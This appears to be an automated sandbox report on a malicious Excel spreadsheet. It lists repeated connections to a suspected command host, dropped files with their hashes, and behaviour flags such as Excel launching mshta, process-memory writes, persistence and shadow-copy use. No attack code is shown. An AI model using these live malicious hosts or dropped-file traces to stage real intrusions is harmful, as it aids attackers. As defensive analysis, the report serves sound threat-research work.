SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 lenscommunity.za.com tcp
SI 91.185.215.20:443 tcp

Files

memory/1196-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1196-1-0x000000007269D000-0x00000000726A8000-memory.dmp

memory/2436-21-0x00000000025E0000-0x00000000025E2000-memory.dmp

memory/1196-22-0x0000000002ED0000-0x0000000002ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\Ciguy[1].htm

MD5 0104c301c5e02bd6148b8703d19b3a73
SHA1 7436e0b4b1f8c222c38069890b75fa2baf9ca620
SHA256 446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f
SHA512 84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8Y2836BA.txt

MD5 eb8e5d6ec5cca9c60608d5f23c7f0180
SHA1 56387177e3cf9c8f2aa58f50c6d3ed7a4efea680
SHA256 efd1705d8cf75b4197ba248e18c634e3f4b7f066b92e21e4998fa79ea0a3d34f
SHA512 3dcb64d59425295e28c136715e350956ab103d80e89bb0ffa7747db567e5b03f8e71411c8292a7fe603ebe1becb421aa0ab2034ff797b86f643a25722fa35849

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 1cb06f1e183e4e348ce60eeb1e427c30
SHA1 d636a267b36c2ca8476ea854391fbf8cd190bedb
SHA256 85514277b4b716f4e503a270445f06ff816c378c6b54917c2107b440ad5cee93
SHA512 247145cb9a3bba1c4c161ae60ed18370aa8e01666669e3c87ffa464a6b5d098a47cf4ad467f234ad6b84c39b36d617aa1ab365731385511127123e5c8c5943cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 b0b14bfdb6d427e2d183fc2575d6f673
SHA1 b0963448fc8dd40b2405e43509b0b8fb4fa70c34
SHA256 ee9b46f3ab6ac26ad3bf22cf1fa724efa675e6b9f2ef5556530394f2bab68297
SHA512 dfb342e550c29e227f0719a57e18e3912dd43ac735e2865b3b5eeea0187820a1cfaa1420b3eeb124f0345a8c69cbfae3b7e29268cbfe42df6e8c5be465999b77

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9115ea4e2f57d441ee03f5582611b6d0
SHA1 41f02027cba47eb6158e2c47828de96b1033b6b0
SHA256 43293153f05c8e615959ed528918a332b1f2e6ac082c23d607f4405acd0c7917
SHA512 2ca226bdf8578511c6bc9350106fb69485b9a1da82dc3496eedae70654b691c875e63c0ca5a496eed231f334609e761d2e88115025e04e32b2d5bbd5b239827c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8885c7cb3463d397fb8cb09e1c0510c0
SHA1 7509f1aeec4bd642fc488a91c059a905a1ebb9d0
SHA256 ca64425e5ad5c5855e25a073e4af24c2ea7a59c41d09d3c929d23c5bb287aaaf
SHA512 ec9c90b3658e9b2c98fec30da7c6aef7a7b16c61b33c3588148bd44554137f63a0e447b63cb5e9d9d79f546921ce373191b3ac7b29588c5cf3a64d620509c2b9

C:\Users\Admin\AppData\Local\Temp\Cab362D.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\alz[1].hta

MD5 cf573287d1845d0c33aba5af99121331
SHA1 5338c9ef25f8aaecaaf48db274efdd048987c66c
SHA256 dface533aae3c418c2ff081471b5362fc2bbad4ad7fe99180b0f0be880ddd60d
SHA512 66e513984de433000c25f59cba3c426241ac6deac1079b7e5ece61c59ae80ed5dd5bcd3866059b1074b9ae61f535c24ae181f966484e4d8ea3526ac0509cf48f

\??\c:\Users\Admin\AppData\Local\Temp\hrpecqqj.cmdline

MD5 129feffd11be38bebf42da01f97f17be
SHA1 df7f6b056ea1627192b8c46c59ece261b964bb15
SHA256 990d68c66f349154192364e360fd1e82137180f21cd2c8da5979075155714bc9
SHA512 e6863f2b507d3b05fedceb02e2e4d795ad303b368098d561fb06a54b53f2a0ed5125b7f810a29ad372fceedfd43a341dff670112c239363b695f8f5d0257b20e

\??\c:\Users\Admin\AppData\Local\Temp\hrpecqqj.0.cs

MD5 4baee22b8aa20472316e9ea4bdb51bc6
SHA1 e2ebe036e53eb17cad6e8941e7688884aa571e5a
SHA256 50a004d5479bbbf5c9f8fe7e2eb511e4142910e1efc5ad8c20b2ff91e691a1c3
SHA512 9b1b2c88d1c843af8e6730a5a15975ddb4c8442c16d2645e07c52e67d4cd2728d9fe6bc3dd16c6e4df0f6882ca12ae717a580a4bbe69da62bfc184c97b2691d9

\??\c:\Users\Admin\AppData\Local\Temp\CSC3E67.tmp

MD5 79a77bad35e8fd00d0ca0a632fffec05
SHA1 31a1c86cd0a92008bb35329fe412f916c0ef668e
SHA256 4a1e5b2e94bb292c92074db5e6709405d5c2fc068eba5ba47941f1aaa171f7f1
SHA512 84dd8d5b288cd7f90a46b35e25bec180d82bfe62554509a7d18b594372174c0c9193c1edcf16e54603e4140c60fe91c5878ea88aca7354db5ebe4808eb063d5d

C:\Users\Admin\AppData\Local\Temp\hrpecqqj.pdb

MD5 b75b052514bea2bc9cfa7c63a2900493
SHA1 7d88352f01addac89520a25332f4e49468b33d7c
SHA256 7bca047e5b68f2ee3b21517ebbfa232c441c7bb374df15d66aabe0af0f657b29
SHA512 a55b29a605084a5c0ea6d705b2545ed37d97d224af14f8b46761ae1517569e272a45b2c5e24d374237c26197da9ee6a2db412394095032e429a3eb41a70574f0

C:\Users\Admin\AppData\Local\Temp\hrpecqqj.dll

MD5 06018b2cb7203e3bc13132f1f431b12c
SHA1 761a9f7faedaad530f8cd0a4cc1aa10bafc656bb
SHA256 72c3a7c98b7c7b30a6993e0a53cc00bc85c13511c3b21a16bc83a44aa6e24fc3
SHA512 bc497aa463e17071335f355195ad479f713fa7109ee1b9a578ed1686490b7f0d6535f0589f6b5336fd8a64e98fa81f74f14b439afcac7fd4a7d9f8efa4817f43

C:\Users\Admin\AppData\Local\Temp\RES3E68.tmp

MD5 97e062671fcbfd6a00e63771ff764395
SHA1 33e9fd75f2c6c563734ba70c8b3e1376e3f8f2f4
SHA256 f0978e0011d87cd888c89979262e8316ff44409672fad9a4f8f69b98f448df08
SHA512 e34c46b3906eec83a64b0c99f97b8acd492e0d2bd3a0fbc75049844e4e85c8b8a1eaa1bd35f3746ed1946a4550934d13a03e57b5816158d2627793a31f224f89

C:\Users\Admin\AppData\Roaming\igccu.exe

MD5 3803a58f9512197b7242462789defc41
SHA1 747d8969e43395649d765d55a3f9fa4fe492bd21
SHA256 f10ea3e1160e4966e71b49dc53997d122b999f57e398ed5578bd20fbf8254bfd
SHA512 5923a7670e36ab65a58b6b767ebed5b5bd4b38442c434c385311af62a2b4a00d3c7293f208dac1ed06430e1d5ce6968c2a6680bef8cae468c3110f40e7ce5df5

memory/676-71-0x00000000001F0000-0x00000000001FC000-memory.dmp

memory/1196-72-0x000000007269D000-0x00000000726A8000-memory.dmp

memory/1196-74-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1196-77-0x000000007269D000-0x00000000726A8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 17:16

Reported

2024-06-26 17:18

Platform

win10v2004-20240611-en

Max time kernel

143s

Max time network

126s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1556 wrote to memory of 4372 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1556 wrote to memory of 4372 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 lnkz.at udp
US 172.67.180.182:80 lnkz.at tcp
US 172.67.180.182:443 lnkz.at tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 182.180.67.172.in-addr.arpa udp
US 172.245.135.155:80 172.245.135.155 tcp
US 8.8.8.8:53 155.135.245.172.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

memory/1556-0-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-1-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-2-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-4-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-3-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-6-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-7-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-5-0x00007FFDBAA6D000-0x00007FFDBAA6E000-memory.dmp

memory/1556-10-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-11-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-9-0x00007FFD78860000-0x00007FFD78870000-memory.dmp

memory/1556-8-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-12-0x00007FFD78860000-0x00007FFD78870000-memory.dmp

memory/1556-14-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-16-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-15-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-13-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-20-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-19-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-18-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-17-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/4372-44-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/4372-52-0x00007FF7E5E00000-0x00007FF7E5E08000-memory.dmp

memory/1556-54-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/4372-55-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp

memory/1556-80-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-81-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-83-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-82-0x00007FFD7AA50000-0x00007FFD7AA60000-memory.dmp

memory/1556-84-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmp